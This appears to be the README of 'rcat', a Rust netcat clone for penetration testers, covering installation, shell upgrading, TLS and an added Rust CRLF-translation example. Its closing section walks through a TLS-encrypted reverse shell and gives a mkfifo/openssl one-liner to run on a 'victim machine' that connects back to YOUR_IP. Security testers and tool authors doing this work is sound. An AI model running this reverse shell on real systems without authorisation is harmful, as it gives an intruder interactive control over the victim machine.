Rcat is a modern netcat written in Rust, packed with features for hackers.
Here we listen on port `tcp:9001`, and receive an HTTP request made with `curl`.
We provide binaries for:
- Linux amd64
- Linux arm64
- Windows (amd64)
- Mac OS (arm64)
```bash
git clone git@github.com:0xfalafel/rcat.git
cargo install --path .
```
Rcat keeps a syntax similar to netcat. You already know how to use it: `-l` to listen, `-u` for UDP.
Rcat can upgrade your shells with the `--pwn` option.
With an upgraded shell, you can use shortcuts like Ctrl + C, clear the terminal with `clear` or Ctrl + L, etc. It's like having an SSH connection. There is no need to type 7 commands each time you obtain a reverse shell.
Here the commands `stty rows 22 cols 65` and `export TERM=xterm-256colors` are typed automatically when the connection is received.
Unless you use the `-R` option, the remote terminal is automatically resized when you change the size of your terminal. (Rcat sends a SIGTSTP, resizes the terminal with the `stty` command, then uses `fg` to bring the suspended application back to the foreground.)
In this clip we run `htop` on the victim machine, and the reverse shell is automatically resized.
Support for TLS with `-t` or `--tls`.

Here we do an HTTPS request. We use `-t` to establish a TLS connection, and `-c` to replace newlines (`\n`) with CRLF newlines (`\r\n`) as required by the HTTP protocol.
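As an added example (not rcat's own code), this is how a `-c`-style translation can be done on a byte stream without corrupting input that already uses CRLF and without losing a pair split across two reads; `CrlfWriter` and `to_crlf` are assumed names:

```rust
// Added example, not rcat's own code: a streaming LF -> CRLF translator in the
// spirit of rcat's `-c` option. `CrlfWriter` and `to_crlf` are assumed names.
use std::io::{self, Write};

/// Wraps a writer and rewrites every bare `\n` as `\r\n`. An existing `\r\n`
/// passes through unchanged (never `\r\r\n`), and a `\r` that ends one chunk is
/// remembered so a `\n` that starts the next chunk is still seen as its pair.
pub struct CrlfWriter<W: Write> {
    inner: W,
    last_was_cr: bool,
}

impl<W: Write> CrlfWriter<W> {
    pub fn new(inner: W) -> Self {
        CrlfWriter { inner, last_was_cr: false }
    }
    pub fn into_inner(self) -> W {
        self.inner
    }
}

impl<W: Write> Write for CrlfWriter<W> {
    fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
        let mut out = Vec::with_capacity(buf.len() + buf.len() / 8);
        for &b in buf {
            if b == b'\n' && !self.last_was_cr {
                out.push(b'\r');
            }
            out.push(b);
            self.last_was_cr = b == b'\r';
        }
        self.inner.write_all(&out)?;
        Ok(buf.len()) // Write contract: report input bytes consumed, not bytes emitted
    }
    fn flush(&mut self) -> io::Result<()> {
        self.inner.flush()
    }
}

/// Translate a whole buffer, feeding it in `chunk`-byte pieces so the
/// chunk-boundary handling is exercised (a chunk size of 0 is treated as 1).
pub fn to_crlf(input: &[u8], chunk: usize) -> Vec<u8> {
    let mut w = CrlfWriter::new(Vec::new());
    for piece in input.chunks(chunk.max(1)) {
        w.write_all(piece).expect("writing into a Vec cannot fail");
    }
    w.into_inner()
}
```

Feeding a constructed request such as `GET / HTTP/1.1\nHost: example.com\n\n` through `to_crlf` yields the same CRLF-terminated bytes regardless of the chunk size used.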
With TLS support, let's see how we can do a TLS-encrypted reverse shell, without installing any new tools on the victim.

If possible, you should probably use a signed certificate (with Let's Encrypt for example), but for now let's use a self-signed certificate.
Let's generate a self-signed certificate with `openssl`.

```bash
openssl genrsa -out private-key.pem 2048
openssl req -new -x509 -key private-key.pem -out my.cert -days 365
```
Armed with this, let's create a listener that supports TLS.

```bash
rcat -l 9001 -t --cert my.cert --key private-key.pem --pwn
```
Then execute the following command on the victim machine:

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1| openssl s_client -connect YOUR_IP:9001 >/tmp/f
```